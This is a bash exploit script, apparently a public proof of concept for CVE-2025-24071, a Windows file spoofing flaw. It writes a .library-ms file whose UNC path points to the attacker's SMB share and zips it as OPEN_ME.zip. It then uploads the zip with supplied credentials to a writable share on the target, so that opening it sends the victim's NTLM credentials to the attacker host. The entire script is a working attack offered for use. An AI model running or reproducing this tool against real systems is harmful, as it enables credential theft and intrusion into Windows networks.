#!/bin/bash # CVE-2025-24071 - Windows File Spoofing Vulnerability # By f4dee # Requirements zip, smbclient set -euo pipefail #Colours greenColour="\e[0;32m\033[1m" endColour="\033[0m\e[0m" redColour="\e[0;31m\033[1m" blueColour="\e[0;34m\033[1m" yellowColour="\e[0;33m\033[1m" purpleColour="\e[0;35m\033[1m" turquoiseColour="\e[0;36m\033[1m" grayColour="\e[0;37m\033[1m" if [ ! -x "$(command -v zip)" ] || [ ! -x "$(command -v smbclient)" ]; then echo "[!] Missing requirements. Installing zip and smbclient..." sudo apt install zip smbclient -y fi function ctrl_c(){ echo -e "\n\n${redColour}[!] Exiting...${endColour}\n" tput cnorm; rm -f pwn3d.library-ms OPEN_ME.zip; exit 1 } #Ctrl+C trap ctrl_c SIGINT function helpPanel(){ echo -e "\n${yellowColour}[+]${endColour}${grayColour} Usage:${endColour}${blueColour} $0${endColour}${greenColour} -i${endColour}${yellowColour} 'YOUR_IP'${endColour}${greenColour} -t${endColour}${yellowColour} 'TARGET_IP'${endColour}${greenColour} -d${endColour}${yellowColour} 'DIRECTORY_WRITE'${endColour} ${greenColour}-u${endColour}${yellowColour} 'USER'${endColour}${greenColour} -p${endColour}${yellowColour} 'PASSWORD'${endColour}\n" echo -e "\t${turquoiseColour}-i)${endColour}${grayColour} Your IP address${endColour}" echo -e "\t${turquoiseColour}-t)${endColour}${grayColour} Target IP${endColour}" echo -e "\t${turquoiseColour}-d)${endColour}${grayColour} A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) ${endColour}" echo -e "\t${turquoiseColour}-u)${endColour}${grayColour} Username${endColour}" echo -e "\t${turquoiseColour}-p)${endColour}${grayColour} Password${endColour}" echo -e "\t${turquoiseColour}-h)${endColour}${grayColour} Display this help panel${endColour}" } function exploit(){ file="pwn3d.library-ms" ip="$1" target="$2" directory="$3" user="$4" password="$5" payload=""" \\\\$ip\\smbFolder """ tput civis echo -e "\n${purpleColour}-----Welcome to CVE-2025-24071-----${endColour}\n" echo -e "${yellowColour}[*]${endColour}${grayColour} Verifying connectivity with target host${endColour} ${yellowColour}$target...${endColour}\n" if ping -c 1 $target &>/dev/null; then sleep 1 echo -e "${greenColour}[+] Host $target responded successfully to ping.${endColour}\n" echo "$payload" > "$file" sleep 1 echo -e "${yellowColour}[>]${endColour}${grayColour} Library file $file created...${endColour}\n" sleep 1 echo -e "${yellowColour}[>]${endColour}${grayColour} File created successfully $file...${endColour}\n" sleep 1 if [ -f "$file" ]; then zip -q OPEN_ME.zip "$file" echo -e "${yellowColour}[>]${endColour}${grayColour} Creating ZIP file...${endColour}\n" sleep 1 echo -e "${yellowColour}[>]${endColour}${grayColour} Uploading malicious.zip...${endColour}\n" smbclient \\\\$target\\$directory -U "$user%$password" -c "put OPEN_ME.zip" &>/dev/null echo -e "${redColour}[!] Remove zip and pwn3d.library-ms...${endColour}\n" rm -f OPEN_ME.zip "$file" sleep 1 echo -e "${yellowColour}[~]${endColour}${grayColour} Payload sent successfully. Waiting :D ...${endColour}" else echo -e "${redColour}[!] File $file does not existing...${endColour}" exit 1 fi tput cnorm else echo -e "${redColour}[!] Host $target did not respond to ping; it may be down or unreachable.${endColour}" tput cnorm; exit 1 fi tput cnorm } declare -i parameter_counter=0 while getopts "i:t:d:u:p:h" arg; do case "${arg}" in i) ip="${OPTARG}"; let parameter_counter+=1;; t) target="${OPTARG}"; let parameter_counter+=1;; d) directory="${OPTARG}"; let parameter_counter+=1;; u) user="${OPTARG}"; let parameter_counter+=1;; p) password="${OPTARG}"; let parameter_counter+=1;; h) helpPanel; exit 0;; *) helpPanel; exit 1;; esac done shift "$((OPTIND - 1))" if [ $# -gt 0 ]; then helpPanel fi if [ $parameter_counter -eq 5 ]; then exploit "$ip" "$target" "$directory" "$user" "$password" else helpPanel; exit 1 fi